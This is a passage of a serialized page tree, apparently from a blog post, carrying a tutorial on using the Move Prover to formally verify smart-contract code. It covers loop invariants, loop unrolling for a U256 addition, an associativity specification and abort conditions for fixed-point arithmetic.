"style":359},[18184],{"type":30,"value":911},{"type":24,"tag":301,"props":18186,"children":18187},{"style":385},[18188],{"type":30,"value":772},{"type":24,"tag":301,"props":18190,"children":18191},{"style":359},[18192],{"type":30,"value":873},{"type":24,"tag":301,"props":18194,"children":18195},{"style":369},[18196],{"type":30,"value":15676},{"type":24,"tag":301,"props":18198,"children":18199},{"style":348},[18200],{"type":30,"value":15640},{"type":24,"tag":301,"props":18202,"children":18203},{"style":10246},[18204],{"type":30,"value":15659},{"type":24,"tag":301,"props":18206,"children":18207},{"style":359},[18208],{"type":30,"value":791},{"type":24,"tag":301,"props":18210,"children":18211},{"class":303,"line":512},[18212],{"type":24,"tag":301,"props":18213,"children":18214},{"style":359},[18215],{"type":30,"value":13584},{"type":24,"tag":301,"props":18217,"children":18218},{"class":303,"line":592},[18219,18224,18228,18232,18236,18240],{"type":24,"tag":301,"props":18220,"children":18221},{"style":369},[18222],{"type":30,"value":18223}," i",{"type":24,"tag":301,"props":18225,"children":18226},{"style":385},[18227],{"type":30,"value":2537},{"type":24,"tag":301,"props":18229,"children":18230},{"style":369},[18231],{"type":30,"value":10225},{"type":24,"tag":301,"props":18233,"children":18234},{"style":385},[18235],{"type":30,"value":957},{"type":24,"tag":301,"props":18237,"children":18238},{"style":466},[18239],{"type":30,"value":487},{"type":24,"tag":301,"props":18241,"children":18242},{"style":359},[18243],{"type":30,"value":492},{"type":24,"tag":301,"props":18245,"children":18246},{"class":303,"line":619},[18247],{"type":24,"tag":301,"props":18248,"children":18249},{"style":359},[18250],{"type":30,"value":18251}," };\n",{"type":24,"tag":32,"props":18253,"children":18254},{},[18255,18257,18263,18265,18270,18272,18278],{"type":30,"value":18256},"In this case, the brackets specify the loop invariant for the ",{"type":24,"tag":145,"props":18258,"children":18260},{"className":18259},[],[18261],{"type":30,"value":18262},"while",{"type":30,"value":18264}," loop. Note that because the loop invariant executes ",{"type":24,"tag":5422,"props":18266,"children":18267},{},[18268],{"type":30,"value":18269},"after",{"type":30,"value":18271}," the loop guard, so we need to account for an extra step with ",{"type":24,"tag":145,"props":18273,"children":18275},{"className":18274},[],[18276],{"type":30,"value":18277},"i \u003C= n_coins",{"type":30,"value":206},{"type":24,"tag":291,"props":18280,"children":18282},{"code":18281,"language":9817,"meta":7,"className":9818,"style":7}," while ({\n spec {\n invariant len(amounts_times_coins) == i;\n invariant i \u003C= n_coins;\n invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n };\n (i \u003C n_coins)\n }) {\n",[18283],{"type":24,"tag":145,"props":18284,"children":18285},{"__ignoreMap":7},[18286,18297,18308,18343,18366,18449,18456,18479],{"type":24,"tag":301,"props":18287,"children":18288},{"class":303,"line":304},[18289,18293],{"type":24,"tag":301,"props":18290,"children":18291},{"style":308},[18292],{"type":30,"value":17881},{"type":24,"tag":301,"props":18294,"children":18295},{"style":359},[18296],{"type":30,"value":15347},{"type":24,"tag":301,"props":18298,"children":18299},{"class":303,"line":320},[18300,18304],{"type":24,"tag":301,"props":18301,"children":18302},{"style":369},[18303],{"type":30,"value":15740},{"type":24,"tag":301,"props":18305,"children":18306},{"style":359},[18307],{"type":30,"value":3035},{"type":24,"tag":301,"props":18309,"children":18310},{"class":303,"line":335},[18311,18315,18319,18323,18327,18331,18335,18339],{"type":24,"tag":301,"props":18312,"children":18313},{"style":369},[18314],{"type":30,"value":17904},{"type":24,"tag":301,"props":18316,"children":18317},{"style":314},[18318],{"type":30,"value":15372},{"type":24,"tag":301,"props":18320,"children":18321},{"style":359},[18322],{"type":30,"value":362},{"type":24,"tag":301,"props":18324,"children":18325},{"style":369},[18326],{"type":30,"value":15381},{"type":24,"tag":301,"props":18328,"children":18329},{"style":359},[18330],{"type":30,"value":911},{"type":24,"tag":301,"props":18332,"children":18333},{"style":385},[18334],{"type":30,"value":607},{"type":24,"tag":301,"props":18336,"children":18337},{"style":369},[18338],{"type":30,"value":10225},{"type":24,"tag":301,"props":18340,"children":18341},{"style":359},[18342],{"type":30,"value":492},{"type":24,"tag":301,"props":18344,"children":18345},{"class":303,"line":344},[18346,18350,18354,18358,18362],{"type":24,"tag":301,"props":18347,"children":18348},{"style":369},[18349],{"type":30,"value":17904},{"type":24,"tag":301,"props":18351,"children":18352},{"style":369},[18353],{"type":30,"value":10225},{"type":24,"tag":301,"props":18355,"children":18356},{"style":385},[18357],{"type":30,"value":15012},{"type":24,"tag":301,"props":18359,"children":18360},{"style":369},[18361],{"type":30,"value":15301},{"type":24,"tag":301,"props":18363,"children":18364},{"style":359},[18365],{"type":30,"value":492},{"type":24,"tag":301,"props":18367,"children":18368},{"class":303,"line":401},[18369,18373,18377,18381,18385,18389,18393,18397,18401,18405,18409,18413,18417,18421,18425,18429,18433,18437,18441,18445],{"type":24,"tag":301,"props":18370,"children":18371},{"style":369},[18372],{"type":30,"value":17904},{"type":24,"tag":301,"props":18374,"children":18375},{"style":369},[18376],{"type":30,"value":15432},{"type":24,"tag":301,"props":18378,"children":18379},{"style":369},[18380],{"type":30,"value":15437},{"type":24,"tag":301,"props":18382,"children":18383},{"style":348},[18384],{"type":30,"value":9878},{"type":24,"tag":301,"props":18386,"children":18387},{"style":466},[18388],{"type":30,"value":685},{"type":24,"tag":301,"props":18390,"children":18391},{"style":385},[18392],{"type":30,"value":9887},{"type":24,"tag":301,"props":18394,"children":18395},{"style":369},[18396],{"type":30,"value":10564},{"type":24,"tag":301,"props":18398,"children":18399},{"style":385},[18400],{"type":30,"value":1679},{"type":24,"tag":301,"props":18402,"children":18403},{"style":369},[18404],{"type":30,"value":15236},{"type":24,"tag":301,"props":18406,"children":18407},{"style":359},[18408],{"type":30,"value":541},{"type":24,"tag":301,"props":18410,"children":18411},{"style":369},[18412],{"type":30,"value":15470},{"type":24,"tag":301,"props":18414,"children":18415},{"style":359},[18416],{"type":30,"value":1046},{"type":24,"tag":301,"props":18418,"children":18419},{"style":385},[18420],{"type":30,"value":607},{"type":24,"tag":301,"props":18422,"children":18423},{"style":369},[18424],{"type":30,"value":15483},{"type":24,"tag":301,"props":18426,"children":18427},{"style":359},[18428],{"type":30,"value":541},{"type":24,"tag":301,"props":18430,"children":18431},{"style":369},[18432],{"type":30,"value":15470},{"type":24,"tag":301,"props":18434,"children":18435},{"style":359},[18436],{"type":30,"value":1046},{"type":24,"tag":301,"props":18438,"children":18439},{"style":385},[18440],{"type":30,"value":772},{"type":24,"tag":301,"props":18442,"children":18443},{"style":369},[18444],{"type":30,"value":15301},{"type":24,"tag":301,"props":18446,"children":18447},{"style":359},[18448],{"type":30,"value":492},{"type":24,"tag":301,"props":18450,"children":18451},{"class":303,"line":415},[18452],{"type":24,"tag":301,"props":18453,"children":18454},{"style":359},[18455],{"type":30,"value":15732},{"type":24,"tag":301,"props":18457,"children":18458},{"class":303,"line":439},[18459,18463,18467,18471,18475],{"type":24,"tag":301,"props":18460,"children":18461},{"style":359},[18462],{"type":30,"value":18053},{"type":24,"tag":301,"props":18464,"children":18465},{"style":369},[18466],{"type":30,"value":10564},{"type":24,"tag":301,"props":18468,"children":18469},{"style":385},[18470],{"type":30,"value":3950},{"type":24,"tag":301,"props":18472,"children":18473},{"style":369},[18474],{"type":30,"value":15301},{"type":24,"tag":301,"props":18476,"children":18477},{"style":359},[18478],{"type":30,"value":791},{"type":24,"tag":301,"props":18480,"children":18481},{"class":303,"line":447},[18482],{"type":24,"tag":301,"props":18483,"children":18484},{"style":359},[18485],{"type":30,"value":18077},{"type":24,"tag":32,"props":18487,"children":18488},{},[18489],{"type":30,"value":18490},"Loop invariants are often difficult to write, especially for nontrivial loop bodies.",{"type":24,"tag":32,"props":18492,"children":18493},{},[18494,18496,18501],{"type":30,"value":18495},"The second solution to dealing with loops is to unroll the loop. This technique works in this particular situation because, as we can observe, the loop within the ",{"type":24,"tag":145,"props":18497,"children":18499},{"className":18498},[],[18500],{"type":30,"value":16443},{"type":30,"value":18502}," function will always iterate exactly 4 times:",{"type":24,"tag":291,"props":18504,"children":18506},{"code":18505,"language":9817,"meta":7,"className":9818,"style":7},"/// Total words in `U256` (64 * 4 = 256).\nconst WORDS: u64 = 4;\n\n[...]\n\nlet i = 0;\nwhile (i \u003C WORDS) {\n let a1 = get(&a, i);\n let b1 = get(&b, i);\n\n[...]\n",[18507],{"type":24,"tag":145,"props":18508,"children":18509},{"__ignoreMap":7},[18510,18518,18550,18557,18572,18579,18602,18626,18671,18715,18722],{"type":24,"tag":301,"props":18511,"children":18512},{"class":303,"line":304},[18513],{"type":24,"tag":301,"props":18514,"children":18515},{"style":1062},[18516],{"type":30,"value":18517},"/// Total words in `U256` (64 * 4 = 256).\n",{"type":24,"tag":301,"props":18519,"children":18520},{"class":303,"line":320},[18521,18525,18530,18534,18538,18542,18546],{"type":24,"tag":301,"props":18522,"children":18523},{"style":348},[18524],{"type":30,"value":16460},{"type":24,"tag":301,"props":18526,"children":18527},{"style":359},[18528],{"type":30,"value":18529}," WORDS",{"type":24,"tag":301,"props":18531,"children":18532},{"style":385},[18533],{"type":30,"value":1679},{"type":24,"tag":301,"props":18535,"children":18536},{"style":10246},[18537],{"type":30,"value":12680},{"type":24,"tag":301,"props":18539,"children":18540},{"style":385},[18541],{"type":30,"value":2537},{"type":24,"tag":301,"props":18543,"children":18544},{"style":466},[18545],{"type":30,"value":1041},{"type":24,"tag":301,"props":18547,"children":18548},{"style":359},[18549],{"type":30,"value":492},{"type":24,"tag":301,"props":18551,"children":18552},{"class":303,"line":335},[18553],{"type":24,"tag":301,"props":18554,"children":18555},{"emptyLinePlaceholder":16},[18556],{"type":30,"value":341},{"type":24,"tag":301,"props":18558,"children":18559},{"class":303,"line":344},[18560,18564,18568],{"type":24,"tag":301,"props":18561,"children":18562},{"style":359},[18563],{"type":30,"value":541},{"type":24,"tag":301,"props":18565,"children":18566},{"style":385},[18567],{"type":30,"value":4054},{"type":24,"tag":301,"props":18569,"children":18570},{"style":359},[18571],{"type":30,"value":4059},{"type":24,"tag":301,"props":18573,"children":18574},{"class":303,"line":401},[18575],{"type":24,"tag":301,"props":18576,"children":18577},{"emptyLinePlaceholder":16},[18578],{"type":30,"value":341},{"type":24,"tag":301,"props":18580,"children":18581},{"class":303,"line":415},[18582,18586,18590,18594,18598],{"type":24,"tag":301,"props":18583,"children":18584},{"style":348},[18585],{"type":30,"value":3258},{"type":24,"tag":301,"props":18587,"children":18588},{"style":369},[18589],{"type":30,"value":10225},{"type":24,"tag":301,"props":18591,"children":18592},{"style":385},[18593],{"type":30,"value":2537},{"type":24,"tag":301,"props":18595,"children":18596},{"style":466},[18597],{"type":30,"value":685},{"type":24,"tag":301,"props":18599,"children":18600},{"style":359},[18601],{"type":30,"value":492},{"type":24,"tag":301,"props":18603,"children":18604},{"class":303,"line":439},[18605,18609,18613,18617,18621],{"type":24,"tag":301,"props":18606,"children":18607},{"style":308},[18608],{"type":30,"value":18262},{"type":24,"tag":301,"props":18610,"children":18611},{"style":359},[18612],{"type":30,"value":873},{"type":24,"tag":301,"props":18614,"children":18615},{"style":369},[18616],{"type":30,"value":10564},{"type":24,"tag":301,"props":18618,"children":18619},{"style":385},[18620],{"type":30,"value":3950},{"type":24,"tag":301,"props":18622,"children":18623},{"style":359},[18624],{"type":30,"value":18625}," WORDS) {\n",{"type":24,"tag":301,"props":18627,"children":18628},{"class":303,"line":447},[18629,18633,18638,18642,18647,18651,18655,18659,18663,18667],{"type":24,"tag":301,"props":18630,"children":18631},{"style":348},[18632],{"type":30,"value":9838},{"type":24,"tag":301,"props":18634,"children":18635},{"style":369},[18636],{"type":30,"value":18637}," a1",{"type":24,"tag":301,"props":18639,"children":18640},{"style":385},[18641],{"type":30,"value":2537},{"type":24,"tag":301,"props":18643,"children":18644},{"style":314},[18645],{"type":30,"value":18646}," get",{"type":24,"tag":301,"props":18648,"children":18649},{"style":359},[18650],{"type":30,"value":362},{"type":24,"tag":301,"props":18652,"children":18653},{"style":385},[18654],{"type":30,"value":556},{"type":24,"tag":301,"props":18656,"children":18657},{"style":369},[18658],{"type":30,"value":188},{"type":24,"tag":301,"props":18660,"children":18661},{"style":359},[18662],{"type":30,"value":377},{"type":24,"tag":301,"props":18664,"children":18665},{"style":369},[18666],{"type":30,"value":10564},{"type":24,"tag":301,"props":18668,"children":18669},{"style":359},[18670],{"type":30,"value":589},{"type":24,"tag":301,"props":18672,"children":18673},{"class":303,"line":476},[18674,18678,18683,18687,18691,18695,18699,18703,18707,18711],{"type":24,"tag":301,"props":18675,"children":18676},{"style":348},[18677],{"type":30,"value":9838},{"type":24,"tag":301,"props":18679,"children":18680},{"style":369},[18681],{"type":30,"value":18682}," b1",{"type":24,"tag":301,"props":18684,"children":18685},{"style":385},[18686],{"type":30,"value":2537},{"type":24,"tag":301,"props":18688,"children":18689},{"style":314},[18690],{"type":30,"value":18646},{"type":24,"tag":301,"props":18692,"children":18693},{"style":359},[18694],{"type":30,"value":362},{"type":24,"tag":301,"props":18696,"children":18697},{"style":385},[18698],{"type":30,"value":556},{"type":24,"tag":301,"props":18700,"children":18701},{"style":369},[18702],{"type":30,"value":5613},{"type":24,"tag":301,"props":18704,"children":18705},{"style":359},[18706],{"type":30,"value":377},{"type":24,"tag":301,"props":18708,"children":18709},{"style":369},[18710],{"type":30,"value":10564},{"type":24,"tag":301,"props":18712,"children":18713},{"style":359},[18714],{"type":30,"value":589},{"type":24,"tag":301,"props":18716,"children":18717},{"class":303,"line":495},[18718],{"type":24,"tag":301,"props":18719,"children":18720},{"emptyLinePlaceholder":16},[18721],{"type":30,"value":341},{"type":24,"tag":301,"props":18723,"children":18724},{"class":303,"line":504},[18725,18729,18733],{"type":24,"tag":301,"props":18726,"children":18727},{"style":359},[18728],{"type":30,"value":541},{"type":24,"tag":301,"props":18730,"children":18731},{"style":385},[18732],{"type":30,"value":4054},{"type":24,"tag":301,"props":18734,"children":18735},{"style":359},[18736],{"type":30,"value":4059},{"type":24,"tag":32,"props":18738,"children":18739},{},[18740],{"type":30,"value":18741},"Unrolling the function and running again the Move Prover will print out a \"Success\" message!",{"type":24,"tag":291,"props":18743,"children":18745},{"code":18744},"SUCCESS proving 1 modules from package `u256` in 9.685s\n{\n \"Result\": \"Success\"\n}\n",[18746],{"type":24,"tag":145,"props":18747,"children":18748},{"__ignoreMap":7},[18749],{"type":30,"value":18744},{"type":24,"tag":32,"props":18751,"children":18752},{},[18753,18755,18760,18761,18767],{"type":30,"value":18754},"For the ",{"type":24,"tag":60,"props":18756,"children":18757},{},[18758],{"type":30,"value":18759},"Associative Property",{"type":30,"value":873},{"type":24,"tag":145,"props":18762,"children":18764},{"className":18763},[],[18765],{"type":30,"value":18766},"a+(b+c) = (a+b)+c",{"type":30,"value":18768},") to be true, changing the grouping of addends should not change the sum. To verify this, we will first implement a function which simulates this property:",{"type":24,"tag":291,"props":18770,"children":18772},{"code":18771,"language":9817,"meta":7,"className":9818,"style":7},"fun add_assoc_property(a: U256, b: U256, c: U256): bool {\n let result_1 = add(b, c);\n let result_11 = add(a, result_1);\n let result_2 = add(a, b);\n let result_22 = add(c, result_2);\n\n let cmp = compare(&result_11, &result_22);\n if ( cmp == EQUAL ) true else false\n}\n",[18773],{"type":24,"tag":145,"props":18774,"children":18775},{"__ignoreMap":7},[18776,18853,18892,18933,18972,19013,19020,19070,19108],{"type":24,"tag":301,"props":18777,"children":18778},{"class":303,"line":304},[18779,18783,18788,18792,18796,18800,18804,18808,18812,18816,18820,18824,18828,18832,18836,18840,18844,18849],{"type":24,"tag":301,"props":18780,"children":18781},{"style":369},[18782],{"type":30,"value":13925},{"type":24,"tag":301,"props":18784,"children":18785},{"style":314},[18786],{"type":30,"value":18787}," add_assoc_property",{"type":24,"tag":301,"props":18789,"children":18790},{"style":359},[18791],{"type":30,"value":362},{"type":24,"tag":301,"props":18793,"children":18794},{"style":369},[18795],{"type":30,"value":188},{"type":24,"tag":301,"props":18797,"children":18798},{"style":385},[18799],{"type":30,"value":1679},{"type":24,"tag":301,"props":18801,"children":18802},{"style":10246},[18803],{"type":30,"value":11553},{"type":24,"tag":301,"props":18805,"children":18806},{"style":359},[18807],{"type":30,"value":377},{"type":24,"tag":301,"props":18809,"children":18810},{"style":369},[18811],{"type":30,"value":5613},{"type":24,"tag":301,"props":18813,"children":18814},{"style":385},[18815],{"type":30,"value":1679},{"type":24,"tag":301,"props":18817,"children":18818},{"style":10246},[18819],{"type":30,"value":11553},{"type":24,"tag":301,"props":18821,"children":18822},{"style":359},[18823],{"type":30,"value":377},{"type":24,"tag":301,"props":18825,"children":18826},{"style":369},[18827],{"type":30,"value":294},{"type":24,"tag":301,"props":18829,"children":18830},{"style":385},[18831],{"type":30,"value":1679},{"type":24,"tag":301,"props":18833,"children":18834},{"style":10246},[18835],{"type":30,"value":11553},{"type":24,"tag":301,"props":18837,"children":18838},{"style":359},[18839],{"type":30,"value":9961},{"type":24,"tag":301,"props":18841,"children":18842},{"style":385},[18843],{"type":30,"value":1679},{"type":24,"tag":301,"props":18845,"children":18846},{"style":10246},[18847],{"type":30,"value":18848}," bool",{"type":24,"tag":301,"props":18850,"children":18851},{"style":359},[18852],{"type":30,"value":3035},{"type":24,"tag":301,"props":18854,"children":18855},{"class":303,"line":320},[18856,18860,18864,18868,18872,18876,18880,18884,18888],{"type":24,"tag":301,"props":18857,"children":18858},{"style":348},[18859],{"type":30,"value":9838},{"type":24,"tag":301,"props":18861,"children":18862},{"style":369},[18863],{"type":30,"value":15007},{"type":24,"tag":301,"props":18865,"children":18866},{"style":385},[18867],{"type":30,"value":2537},{"type":24,"tag":301,"props":18869,"children":18870},{"style":314},[18871],{"type":30,"value":16387},{"type":24,"tag":301,"props":18873,"children":18874},{"style":359},[18875],{"type":30,"value":362},{"type":24,"tag":301,"props":18877,"children":18878},{"style":369},[18879],{"type":30,"value":5613},{"type":24,"tag":301,"props":18881,"children":18882},{"style":359},[18883],{"type":30,"value":377},{"type":24,"tag":301,"props":18885,"children":18886},{"style":369},[18887],{"type":30,"value":294},{"type":24,"tag":301,"props":18889,"children":18890},{"style":359},[18891],{"type":30,"value":589},{"type":24,"tag":301,"props":18893,"children":18894},{"class":303,"line":335},[18895,18899,18904,18908,18912,18916,18920,18924,18929],{"type":24,"tag":301,"props":18896,"children":18897},{"style":348},[18898],{"type":30,"value":9838},{"type":24,"tag":301,"props":18900,"children":18901},{"style":369},[18902],{"type":30,"value":18903}," result_11",{"type":24,"tag":301,"props":18905,"children":18906},{"style":385},[18907],{"type":30,"value":2537},{"type":24,"tag":301,"props":18909,"children":18910},{"style":314},[18911],{"type":30,"value":16387},{"type":24,"tag":301,"props":18913,"children":18914},{"style":359},[18915],{"type":30,"value":362},{"type":24,"tag":301,"props":18917,"children":18918},{"style":369},[18919],{"type":30,"value":188},{"type":24,"tag":301,"props":18921,"children":18922},{"style":359},[18923],{"type":30,"value":377},{"type":24,"tag":301,"props":18925,"children":18926},{"style":369},[18927],{"type":30,"value":18928},"result_1",{"type":24,"tag":301,"props":18930,"children":18931},{"style":359},[18932],{"type":30,"value":589},{"type":24,"tag":301,"props":18934,"children":18935},{"class":303,"line":344},[18936,18940,18944,18948,18952,18956,18960,18964,18968],{"type":24,"tag":301,"props":18937,"children":18938},{"style":348},[18939],{"type":30,"value":9838},{"type":24,"tag":301,"props":18941,"children":18942},{"style":369},[18943],{"type":30,"value":15033},{"type":24,"tag":301,"props":18945,"children":18946},{"style":385},[18947],{"type":30,"value":2537},{"type":24,"tag":301,"props":18949,"children":18950},{"style":314},[18951],{"type":30,"value":16387},{"type":24,"tag":301,"props":18953,"children":18954},{"style":359},[18955],{"type":30,"value":362},{"type":24,"tag":301,"props":18957,"children":18958},{"style":369},[18959],{"type":30,"value":188},{"type":24,"tag":301,"props":18961,"children":18962},{"style":359},[18963],{"type":30,"value":377},{"type":24,"tag":301,"props":18965,"children":18966},{"style":369},[18967],{"type":30,"value":5613},{"type":24,"tag":301,"props":18969,"children":18970},{"style":359},[18971],{"type":30,"value":589},{"type":24,"tag":301,"props":18973,"children":18974},{"class":303,"line":401},[18975,18979,18984,18988,18992,18996,19000,19004,19009],{"type":24,"tag":301,"props":18976,"children":18977},{"style":348},[18978],{"type":30,"value":9838},{"type":24,"tag":301,"props":18980,"children":18981},{"style":369},[18982],{"type":30,"value":18983}," result_22",{"type":24,"tag":301,"props":18985,"children":18986},{"style":385},[18987],{"type":30,"value":2537},{"type":24,"tag":301,"props":18989,"children":18990},{"style":314},[18991],{"type":30,"value":16387},{"type":24,"tag":301,"props":18993,"children":18994},{"style":359},[18995],{"type":30,"value":362},{"type":24,"tag":301,"props":18997,"children":18998},{"style":369},[18999],{"type":30,"value":294},{"type":24,"tag":301,"props":19001,"children":19002},{"style":359},[19003],{"type":30,"value":377},{"type":24,"tag":301,"props":19005,"children":19006},{"style":369},[19007],{"type":30,"value":19008},"result_2",{"type":24,"tag":301,"props":19010,"children":19011},{"style":359},[19012],{"type":30,"value":589},{"type":24,"tag":301,"props":19014,"children":19015},{"class":303,"line":415},[19016],{"type":24,"tag":301,"props":19017,"children":19018},{"emptyLinePlaceholder":16},[19019],{"type":30,"value":341},{"type":24,"tag":301,"props":19021,"children":19022},{"class":303,"line":439},[19023,19027,19031,19035,19040,19044,19048,19053,19057,19061,19066],{"type":24,"tag":301,"props":19024,"children":19025},{"style":348},[19026],{"type":30,"value":9838},{"type":24,"tag":301,"props":19028,"children":19029},{"style":369},[19030],{"type":30,"value":14676},{"type":24,"tag":301,"props":19032,"children":19033},{"style":385},[19034],{"type":30,"value":2537},{"type":24,"tag":301,"props":19036,"children":19037},{"style":314},[19038],{"type":30,"value":19039}," compare",{"type":24,"tag":301,"props":19041,"children":19042},{"style":359},[19043],{"type":30,"value":362},{"type":24,"tag":301,"props":19045,"children":19046},{"style":385},[19047],{"type":30,"value":556},{"type":24,"tag":301,"props":19049,"children":19050},{"style":369},[19051],{"type":30,"value":19052},"result_11",{"type":24,"tag":301,"props":19054,"children":19055},{"style":359},[19056],{"type":30,"value":377},{"type":24,"tag":301,"props":19058,"children":19059},{"style":385},[19060],{"type":30,"value":556},{"type":24,"tag":301,"props":19062,"children":19063},{"style":369},[19064],{"type":30,"value":19065},"result_22",{"type":24,"tag":301,"props":19067,"children":19068},{"style":359},[19069],{"type":30,"value":589},{"type":24,"tag":301,"props":19071,"children":19072},{"class":303,"line":447},[19073,19077,19082,19086,19090,19095,19099,19104],{"type":24,"tag":301,"props":19074,"children":19075},{"style":308},[19076],{"type":30,"value":453},{"type":24,"tag":301,"props":19078,"children":19079},{"style":359},[19080],{"type":30,"value":19081}," ( ",{"type":24,"tag":301,"props":19083,"children":19084},{"style":369},[19085],{"type":30,"value":14741},{"type":24,"tag":301,"props":19087,"children":19088},{"style":385},[19089],{"type":30,"value":2460},{"type":24,"tag":301,"props":19091,"children":19092},{"style":359},[19093],{"type":30,"value":19094}," EQUAL ) ",{"type":24,"tag":301,"props":19096,"children":19097},{"style":348},[19098],{"type":30,"value":10819},{"type":24,"tag":301,"props":19100,"children":19101},{"style":308},[19102],{"type":30,"value":19103}," else",{"type":24,"tag":301,"props":19105,"children":19106},{"style":348},[19107],{"type":30,"value":4365},{"type":24,"tag":301,"props":19109,"children":19110},{"class":303,"line":476},[19111],{"type":24,"tag":301,"props":19112,"children":19113},{"style":359},[19114],{"type":30,"value":698},{"type":24,"tag":32,"props":19116,"children":19117},{},[19118],{"type":30,"value":19119},"Lastly, we want to create a spec block which aborts if the sum overflows, and ensures that the result of the function is true:",{"type":24,"tag":291,"props":19121,"children":19123},{"code":19122,"language":9817,"meta":7,"className":9818,"style":7},"spec add_assoc_property {\n aborts_if (value_of_U256(a) + value_of_U256(b)) + value_of_U256(c) >= P64 * P64 * P64 * P64;\n ensures result == true;\n}\n",[19124],{"type":24,"tag":145,"props":19125,"children":19126},{"__ignoreMap":7},[19127,19142,19246,19269],{"type":24,"tag":301,"props":19128,"children":19129},{"class":303,"line":304},[19130,19134,19138],{"type":24,"tag":301,"props":19131,"children":19132},{"style":369},[19133],{"type":30,"value":15090},{"type":24,"tag":301,"props":19135,"children":19136},{"style":369},[19137],{"type":30,"value":18787},{"type":24,"tag":301,"props":19139,"children":19140},{"style":359},[19141],{"type":30,"value":3035},{"type":24,"tag":301,"props":19143,"children":19144},{"class":303,"line":320},[19145,19149,19153,19158,19162,19166,19170,19174,19178,19182,19186,19190,19194,19198,19202,19206,19210,19214,19218,19222,19226,19230,19234,19238,19242],{"type":24,"tag":301,"props":19146,"children":19147},{"style":369},[19148],{"type":30,"value":16707},{"type":24,"tag":301,"props":19150,"children":19151},{"style":359},[19152],{"type":30,"value":873},{"type":24,"tag":301,"props":19154,"children":19155},{"style":314},[19156],{"type":30,"value":19157},"value_of_U256",{"type":24,"tag":301,"props":19159,"children":19160},{"style":359},[19161],{"type":30,"value":362},{"type":24,"tag":301,"props":19163,"children":19164},{"style":369},[19165],{"type":30,"value":188},{"type":24,"tag":301,"props":19167,"children":19168},{"style":359},[19169],{"type":30,"value":911},{"type":24,"tag":301,"props":19171,"children":19172},{"style":385},[19173],{"type":30,"value":11206},{"type":24,"tag":301,"props":19175,"children":19176},{"style":314},[19177],{"type":30,"value":16509},{"type":24,"tag":301,"props":19179,"children":19180},{"style":359},[19181],{"type":30,"value":362},{"type":24,"tag":301,"props":19183,"children":19184},{"style":369},[19185],{"type":30,"value":5613},{"type":24,"tag":301,"props":19187,"children":19188},{"style":359},[19189],{"type":30,"value":15649},{"type":24,"tag":301,"props":19191,"children":19192},{"style":385},[19193],{"type":30,"value":11206},{"type":24,"tag":301,"props":19195,"children":19196},{"style":314},[19197],{"type":30,"value":16509},{"type":24,"tag":301,"props":19199,"children":19200},{"style":359},[19201],{"type":30,"value":362},{"type":24,"tag":301,"props":19203,"children":19204},{"style":369},[19205],{"type":30,"value":294},{"type":24,"tag":301,"props":19207,"children":19208},{"style":359},[19209],{"type":30,"value":911},{"type":24,"tag":301,"props":19211,"children":19212},{"style":385},[19213],{"type":30,"value":16748},{"type":24,"tag":301,"props":19215,"children":19216},{"style":10246},[19217],{"type":30,"value":16465},{"type":24,"tag":301,"props":19219,"children":19220},{"style":385},[19221],{"type":30,"value":431},{"type":24,"tag":301,"props":19223,"children":19224},{"style":10246},[19225],{"type":30,"value":16465},{"type":24,"tag":301,"props":19227,"children":19228},{"style":385},[19229],{"type":30,"value":431},{"type":24,"tag":301,"props":19231,"children":19232},{"style":10246},[19233],{"type":30,"value":16465},{"type":24,"tag":301,"props":19235,"children":19236},{"style":385},[19237],{"type":30,"value":431},{"type":24,"tag":301,"props":19239,"children":19240},{"style":10246},[19241],{"type":30,"value":16465},{"type":24,"tag":301,"props":19243,"children":19244},{"style":359},[19245],{"type":30,"value":492},{"type":24,"tag":301,"props":19247,"children":19248},{"class":303,"line":335},[19249,19253,19257,19261,19265],{"type":24,"tag":301,"props":19250,"children":19251},{"style":369},[19252],{"type":30,"value":17005},{"type":24,"tag":301,"props":19254,"children":19255},{"style":369},[19256],{"type":30,"value":15967},{"type":24,"tag":301,"props":19258,"children":19259},{"style":385},[19260],{"type":30,"value":2460},{"type":24,"tag":301,"props":19262,"children":19263},{"style":348},[19264],{"type":30,"value":3440},{"type":24,"tag":301,"props":19266,"children":19267},{"style":359},[19268],{"type":30,"value":492},{"type":24,"tag":301,"props":19270,"children":19271},{"class":303,"line":344},[19272],{"type":24,"tag":301,"props":19273,"children":19274},{"style":359},[19275],{"type":30,"value":698},{"type":24,"tag":32,"props":19277,"children":19278},{},[19279],{"type":30,"value":19280},"Running move prover with the new specifications, we can confirm that there are no verification errors:",{"type":24,"tag":291,"props":19282,"children":19283},{"code":18744},[19284],{"type":24,"tag":145,"props":19285,"children":19286},{"__ignoreMap":7},[19287],{"type":30,"value":18744},{"type":24,"tag":32,"props":19289,"children":19290},{},[19291,19293,19300],{"type":30,"value":19292},"For a more complete document detailing Move Prover syntax, we recommend referring to ",{"type":24,"tag":188,"props":19294,"children":19297},{"href":19295,"rel":19296},"https://github.com/move-language/move/blob/main/language/move-prover/doc/user/spec-lang.md",[192],[19298],{"type":30,"value":19299},"spec-lang.md",{"type":30,"value":19301}," in the Move Repository.",{"type":24,"tag":43,"props":19303,"children":19305},{"id":19304},"use-cases",[19306],{"type":30,"value":19307},"Use Cases",{"type":24,"tag":32,"props":19309,"children":19310},{},[19311],{"type":30,"value":19312},"Formal verification can prove that a smart contract satisfies the given requirements for all possible cases without even running the contract. The hard part is coming up with the specifications.",{"type":24,"tag":32,"props":19314,"children":19315},{},[19316],{"type":30,"value":19317},"Here, we hope to explore some practical examples of possible verification ideas.",{"type":24,"tag":80,"props":19319,"children":19321},{"id":19320},"error-conditions",[19322],{"type":30,"value":19323},"Error Conditions",{"type":24,"tag":32,"props":19325,"children":19326},{},[19327,19329,19335],{"type":30,"value":19328},"Taking an example from ",{"type":24,"tag":145,"props":19330,"children":19332},{"className":19331},[],[19333],{"type":30,"value":19334},"std::fixed_point32",{"type":30,"value":19336},", it's often useful to explicitly define when a function might abort. For example, arithmetic operations with fixed point numbers should only error if they overflow.",{"type":24,"tag":291,"props":19338,"children":19340},{"code":19339,"language":9817,"meta":7,"className":9818,"style":7}," spec schema MultiplyAbortsIf {\n val: num;\n multiplier: FixedPoint32;\n aborts_if spec_multiply_u64(val, multiplier) > MAX_U64 with EMULTIPLICATION;\n }\n spec fun spec_multiply_u64(val: num, multiplier: FixedPoint32): num {\n (val * multiplier.value) >> 32\n 